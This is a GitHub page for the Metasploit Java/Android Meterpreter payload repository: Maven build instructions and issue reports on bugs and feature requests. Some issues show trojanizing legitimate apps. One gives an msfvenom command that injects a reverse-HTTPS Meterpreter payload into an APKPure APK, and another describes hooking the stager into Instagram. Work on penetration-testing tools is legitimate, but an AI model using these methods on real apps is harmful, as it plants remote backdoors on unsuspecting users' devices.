metasploit-javapayload's Introduction

This repository has been merged into metasploit-payloads

Please note that this repository has been merged into a unified repository for meterpreters: https://github.com/rapid7/metasploit-payloads

The history has been preserved, along with prehistory from metasploit-framework: https://github.com/rapid7/metasploit-payloads/tree/master/java

If you have any old PRs, please rebase them on the new repository. See rapid7/meterpreter#110 for discussion of why we merged these repositories back together.

Build Instructions

To compile JavaPayload for Metasploit (including Java Meterpreter), you need Maven 3.0 or above. Just run

mvn package

to package all the files, or

mvn -P deploy package

to package all the files and copy them into the correct place for Metasploit (../metasploit-framework/data/java). If you get spurious compilation errors, make sure that there is an exclude rule in your antivirus for the Metasploit directory (or that your antivirus is disabled).

If the path to your metasploit framework repository is not ../metasploit-framework, but for example ../msf3, use

mvn -D deploy.path=../msf3 -P deploy package

In case you want to edit/debug JavaPayload for Metasploit or Java Meterpreter, Maven provides plugins to auto-generate project files for your favourite IDE (at least for Eclipse, Netbeans or IntelliJ). I use Eclipse, so to generate project files I use

mvn eclipse:eclipse

This will generate project files that can be imported via

File->Import->Existing Projects into Workspace

into your Eclipse workspace.

(Note that if this is your first Maven project you want to use in Eclipse, you also have to run

mvn -Declipse.workspace=/path/to/your/workspace eclipse:configure-workspace

to set up path variables like M2_REPO to point to the correct location.)

For NetBeans or IntelliJ IDEA, refer to the documentation at

http://maven.apache.org/netbeans-module.html
http://maven.apache.org/plugins/maven-idea-plugin/

Android

  1. Download the Android SDK and the Android NDK to a location of your choice
  2. Launch the sdk/tool/android program
  3. Install API version 10, and update the "Android SDK Tools" and "Android SDK Platform-tools"
  4. Compile Android Meterpreter:
mvn package -Dandroid.sdk.path=/path/to/android-sdk -Dandroid.ndk.path=/path/to/android-ndk -Dandroid.release=true -P deploy

metasploit-javapayload's People

Contributors

anwarmohamed, arobinson-r7, bturner-r7, egypt, jack64, jlee-r7, joevennix, jvazquez-r7, jvennix-r7, limhoff-r7, oj, schierlm, simonirwin-r7, timwr, todb, wvu

metasploit-javapayload's Issues

post/test/meterpreter is failing on Android

The post/test/meterpreter module is currently (as of 4830dff) failing on Android, but passing on java.

msf exploit(handler) > use post/test/meterpreter 
msf post(meterpreter) > set session 1
session => 1
msf post(meterpreter) > run

[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_fs_file_expand_path: Operation failed: 1
[-] Call stack:
[-]   /home/user/dev/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:139:in `expand_path'
[-]   /home/user/dev/git/metasploit-framework/test/modules/post/test/meterpreter.rb:41:in `setup'
[*] Post module execution completed

Getsystem on Windows

It would be great if the Java meterpreter could have the ability to getsystem when it is deployed on a Windows system.

This is very useful when exploiting Java based vulnerabilities in the browser.

Error when i modify an apk

Hi, I want to modify an apk, so I do that:

msfvenom -x APKPure_v3.17.29_apkpure.com.apk -p android/meterpreter/reverse_https LHOST=My_IP LPORT=443 -o apkpure.apk

But I have this error:

W: /tmp/d20211107-1355-1vbcgal/original/res/layout-v22/material_timepicker_dialog.xml:2: error: No resource identifier found for attribute 'accessibilityPaneTitle' in package 'android'
W: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_72762702050430616616466299950788491245.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 28, --version-code, 3172901, --version-name, 3.17.29, --no-version-vectors, -F, /tmp/APKTOOL281962750424967257.tmp, -e, /tmp/APKTOOL17564809524669596266.tmp, -0, arsc, -I, /home/imprevisible/.local/share/apktool/framework/1.apk, -S, /tmp/d20211107-1355-1vbcgal/original/res, -M, /tmp/d20211107-1355-1vbcgal/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

How can I path that?

Java Meterpreter process.execute and arguments

Issue rapid7/meterpreter#98 is really a Java thing, but was opened over there so the links from Redmine would work as expected.

What actually should happen is some more sane and thoughtful naming of this repo, or have everything be a subproject of rapid7/meterpreter, or something. I know we talked about this, but that's way beyond the scope of this bug.

Intermittent testShellStage failure

When building this repository the tests sometimes fail like so:

-------------------------------------------------------
 T E S T S
-------------------------------------------------------
Running javapayload.stage.MeterpreterTest
Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.348 sec
Running javapayload.stage.ShellTest
Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.002 sec <<< FAILURE!
testShellStage(javapayload.stage.ShellTest)  Time elapsed: 0.002 sec  <<< FAILURE!
junit.framework.AssertionFailedError: MagicToken missing in shell output: 
    at junit.framework.Assert.fail(Assert.java:47)
    at junit.framework.Assert.assertTrue(Assert.java:20)
    at javapayload.stage.ShellTest.testShellStage(Unknown Source)
Running metasploit.PayloadTest
Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2.717 sec
Results :
Failed tests:   testShellStage(javapayload.stage.ShellTest): MagicToken missing in shell output: 

As seen here:
https://travis-ci.org/rapid7/metasploit-javapayload/jobs/27319619

This bug is intermittent so it's difficult to pin down what's causing it. The work-around is to rebuild, as it appears to occur about 1 in 10 tries.

@schierlm recommended here: #17 that we increase the timeout.

Android Meterpreter Reverse HTTPS failure

I've been using the android stager files Payload.java and PayloadTrustManager.java to "patch" other apps (then hooking onCreate() with Payload.startInPath(getApplicationContext().getFilesDir().toString()); ) and it's working using reverse_tcp, but now I'm trying to use reverse_https and I'm getting an error: java.lang.ClassNotFoundException: com.metasploit.stage.PayloadTrustManager at Payload.loadStage(Payload.java:146), so I'm guessing it's failing because it's trying to use the PTM that's usually inside the generated apk, but since I'm not using the generated apk but adding the stager java files to another apk manually, I don't suppose there's a way I can tell meterpreter to look for that class inside an arbitrary package? For the stager, I changed the package name on both Payload.java and PayloadTrustManager.java so that the Payload.startInPath(getApplicationContext().getFilesDir().toString()); hook worked, perhaps this must be done on the stage side as well.
Here's some more logcat stuff:

Caused by: java.lang.ClassNotFoundException: Didn't find class com.metasploit.stage.PayloadTrustManager" on path: DexPathList[[zip file  "/data/data/com.instagram.android/files/met.jar"],nativeLibraryDirectories=/data/data/com.instagram.android/files, /vendor/lib, /system/lib]]

I tried to trace the rest of the logcat errors and ended up on https://github.com/rapid7/metasploit-javapayload/blob/master/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java at line 196:

Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});

where getPayloadTrustManager() is defined as:

protected String getPayloadTrustManager() {
        return "com.metasploit.meterpreter.PayloadTrustManager";
    }

maybe that's the problem.
My test phone is a Samsung Galaxy S4 (i9505), OS: Android 5.0.1 - Linux 3.4.0-4760392 (armv7l) and my metasploit framework is the latest GIT version.
I've also been getting Failed to load extension: No module of the name ext_server_android.jar found even with the msfvenom generated APKs, but that's another issue altogether.

If there's any other information you'd like me to provide regarding this issue please let me know.

Thanks and keep up the great work!

Meterpreter apk receives "INSTALL_PARSE_FAILED_NO_CERTIFICATES" error.

I've tried recently to use the android meterpreter (reverse_tcp, http and https), and all apk generated from msfpayload give out the same error on install (be it through adb or direct install on the phone). The error is "INSTALL_PARSE_FAILED_NO_CERTIFICATES", on both Samsung Galaxy S4 LTE-A's CyanogenMod11 and Alcatel One Touch stock 4.4.2.
I do not know if the problem lies with the android meterpreter itself or msfpayload.

Making msfpayload take into account added res files.

Hi,
I am working on a security threat awareness demo, focusing on BYOD and everything mobile.
I was wondering if there is an easy way to add a display to the Android Meterpreter (no actual app, but just change the Launch Activity to display simple things).
I tried modifying it just to display a background image, but even with such a tiny modification, even though compilation goes well, msf does not seem to include the picture in the final apk.

Extensions Architecture

Can't we make an architecture for extensions instead of loading all meterpreter commands all in time, just like those in the native meterpreter repo?

Java Meterpreter fails to stat the root directory when given more than one /

meterpreter > ls //
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cat ...
java.lang.StringIndexOutOfBoundsException: String index out of range: 0
   at java.lang.String.charAt(libgcj.so.81)
   at java.io.File._stat(libgcj.so.81)
   at java.io.File.isHidden(libgcj.so.81)
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.stat(Unknown Source)
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.execute(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.executeCommand(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at java.lang.reflect.Constructor.newInstance(libgcj.so.81)
   at javapayload.stage.Meterpreter.start(Unknown Source)
   at java.lang.reflect.Method.invoke(libgcj.so.81)
   at metasploit.Payload.bootstrap(Unknown Source)
   at metasploit.Payload.main(Unknown Source)
java.io.IOException: File/directory does not exist: //
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.execute(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.executeCommand(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at java.lang.reflect.Constructor.newInstance(libgcj.so.81)
   at javapayload.stage.Meterpreter.start(Unknown Source)
   at java.lang.reflect.Method.invoke(libgcj.so.81)
   at metasploit.Payload.bootstrap(Unknown Source)
   at metasploit.Payload.main(Unknown Source)

Java HTTP(S) problems

I'm currently noticing some weirdness with java/meterpreter/reverse_http and reverse_https (reverse_tcp works great). e.g:

payload => java/meterpreter/reverse_http
lhost => 172.16.197.79
lport => 4444
ExitOnSession => false
[*] Exploit running as background job.

[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
msf exploit(handler) > [*] 172.16.197.79:39083 (UUID: 684788547e5d8a86/java=17/java=4/2015-05-08T07:13:24Z) Staging Java payload ...
[*] Meterpreter session 1 opened (172.16.197.79:4444 -> 172.16.197.79:39083) at 2015-05-08 08:13:24 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls

Listing: /home/user/dev/git/metasploit-framework
================================================
<snip>

After the initial weirdness things seem to work, but commands also seem to take a lot longer, so I suspect there is a timeout problem somewhere.

I also noticed this, however I can no longer reproduce:

payload => java/meterpreter/reverse_https
HandlerSSLCert => correct.pem
StagerVerifySSLCert => true
lhost => 172.16.197.79
lport => 4444
ExitOnSession => false
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
msf exploit(handler) > [*] 172.16.197.79:39936 (UUID: 3d6ea094545c7028/java=17/java=4/2015-05-08T04:26:04Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 1 opened (172.16.197.79:4444 -> 172.16.197.79:39936) at 2015-05-08 06:33:41 +0100
[*] 172.16.197.79:39938 (UUID: cb00083855c7f36e/java=17/java=4/2015-05-08T05:33:48Z) Staging Java payload ...
[*] Meterpreter session 2 opened (172.16.197.79:4444 -> 172.16.197.79:39938) at 2015-05-08 06:33:48 +0100

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter java/java               172.16.197.79:4444 -> 172.16.197.79:39936 (172.16.197.79)
  2   meterpreter java/java               172.16.197.79:4444 -> 172.16.197.79:39938 (172.16.197.79)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /home/user/dev/git/metasploit-framework
================================================

<snip>

I'll hopefully fix this with the addition of the set_timeout command, but I thought I'd raise it here for visibility.

Hashdump on Windows

It would be great if the Java meterpreter could have the ability to hashdump when it is deployed on a Windows system.

This is very useful when exploiting Java based vulnerabilities in the browser.
